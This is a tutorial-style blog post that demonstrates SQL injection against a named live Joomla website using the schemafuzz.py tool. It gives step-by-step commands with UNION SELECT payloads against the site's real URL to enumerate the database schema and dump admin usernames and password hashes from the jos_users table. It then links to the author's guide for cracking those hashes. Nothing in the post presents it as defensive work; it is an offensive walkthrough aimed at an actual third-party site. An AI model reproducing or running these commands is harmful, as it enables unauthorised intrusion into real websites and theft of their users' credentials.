POC : Use SCHEMAFUZZ
data:image/s3,"s3://crabby-images/c2886/c2886638f1a963b503b6d1f9497c205961131f7e" alt=""
data:image/s3,"s3://crabby-images/31141/31141b54b6864ed984b9ff67db8b7242b83e941a" alt=""
Now, i will show you how to use SQL Injection Vulnerability to get username n password.
This web site is joomla based n you can use this technique with all web site based
I use a script that was built based on python programming language, that call is Schemafuzz.py
first step is find a target....
as shown below ...
data:image/s3,"s3://crabby-images/3b27a/3b27adab79d074e76ddb368c4b3cfa42c2bd735c" alt=""
and we must check to know that web was vurnerability for SQL Injection with give a single quotes (') in last URL
and if thare is a error page it's mean that vulnerrability.
This web show us it's error is
Warning: sort() expects parameter 1 to be array, null given in /home/webdata/archivesofrss.org/htdocs/components/com_biographies/biographies.php on line 168
Warning: natsort() [function.natsort]: The argument should be an array in /home/webdata/archivesofrss.org/htdocs/components/com_biographies/biographies.php on line 170
as shown below ...
data:image/s3,"s3://crabby-images/5bbfd/5bbfdf3eae76b29b14335d0886edf2b072ba967c" alt=""
Oke, This is a file a Schemafuzz.py
as shown below ...
data:image/s3,"s3://crabby-images/aa4b8/aa4b87616342cb03c8438f15617188260821be91" alt=""
And if we use a command "./schemafuzz.py -h" we will all option ini that script....
as shown below ...
data:image/s3,"s3://crabby-images/b1295/b12950eceaf6614332a8dcc1378f3cba8a30d03c" alt=""
next, we must to know how much colomn n magic colomn number with command ./schemafuzz.py -u "http://www.archivesofrss.org/index.php?option=com_biographies&task=showFile&biobookid=5" --findcol
option -u = URL
option --findcol = to find a colomn
as shown below ...
data:image/s3,"s3://crabby-images/93854/93854274087b13d55d0d514fc65c8f8349a8d1eb" alt=""
The result isn like this
as shown below ...
data:image/s3,"s3://crabby-images/02b87/02b87cbe72c565e179600cda41427c20f88cca34" alt=""
next, we use a command ./schemafuzz.py -u "http://www.archivesofrss.org/index.php?option=com_biographies&task=showFile&biobookid=5+AND+1=2+UNION+SELECT+0,darkc0de,2,3" --info
option --info = to find a database used
as shown below ...
data:image/s3,"s3://crabby-images/1fc6b/1fc6b0632c548960d65e5fb4216f092f8cfe7492" alt=""
The result isn like this
as shown below ...
data:image/s3,"s3://crabby-images/e9fa3/e9fa394621498e2ada72e74da31e6d61ab0c6950" alt=""
from that result, we know that the databese used is "rssarchive", so we use next command is ./schemafuzz.py -u "http://www.archivesofrss.org/index.php?option=com_biographies&task=showFile&biobookid=5+AND+1=2+UNION+SELECT+0,darkc0de,2,3"--schema -D rssarchive
option --schema = to know all tabel n colomn in a databasa
option -D = the database that want to know
as shown below ...
data:image/s3,"s3://crabby-images/e35c3/e35c3c02d6671c6485df4ade2c370f6acd839894" alt=""
The result isn like this
as shown below ...
data:image/s3,"s3://crabby-images/30fd4/30fd48bba9a84faf4ab16fa836da213d7a51140d" alt=""
data:image/s3,"s3://crabby-images/4e234/4e234a35ab43774d04f0277f7b5ac76e9012e045" alt=""
data:image/s3,"s3://crabby-images/d5678/d5678e58bac77cfbb7f4cddcee7b2d4b15dd1f01" alt=""
from that picture, we found a table called jos_users n colomn username,password,usertype,etc that save a usernama n password from joomla admin.
so, we use a last command to get a username n passsword. The command is ./schemafuzz.py -u "http://www.archivesofrss.org/index.php?option=com_biographies&task=showFile&biobookid=5+AND+1=2+UNION+SELECT+0,darkc0de,2,3" --dump -D rssarchive -T jos_users -C username,password,usertype
as shown below ...
data:image/s3,"s3://crabby-images/dfdae/dfdae6958d86bab66d36f12e827e73982258c9da" alt=""
The result is like this
as shown below ...
data:image/s3,"s3://crabby-images/95324/9532481926adb6a7b521b25a0476137ad08f7a81" alt=""
from that picture we get a usernama n password
next step we must crack that password. You can see that way in my Blog http://web-vuln.blogspot.com/2010/01/cracking-password-joomla-hash-md5salt.html
You can download that schemafuzz.py script ini HERE
See u next soon.....
0 Response to "POC : Use SCHEMAFUZZ"
Post a Comment